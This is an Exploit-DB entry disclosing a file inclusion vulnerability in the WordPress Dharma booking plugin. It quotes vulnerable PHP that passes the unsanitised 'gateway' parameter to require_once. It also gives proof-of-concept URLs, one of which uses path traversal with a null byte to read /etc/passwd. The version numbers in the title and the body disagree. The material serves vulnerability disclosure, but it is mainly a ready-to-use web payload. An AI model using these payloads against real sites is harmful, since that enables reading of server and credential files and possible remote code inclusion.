WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability

2016-03-22T00:00:00
ID EDB-ID:39592
Type exploitdb
Reporter AMAR^SHG
Modified 2016-03-22T00:00:00

Description

WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: Wordpress Dharma booking File Inclusion

# Date: 03/22/2016

# Exploit Author: AMAR^SHG

# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/

<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/

# Version: <=2.28.3

# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00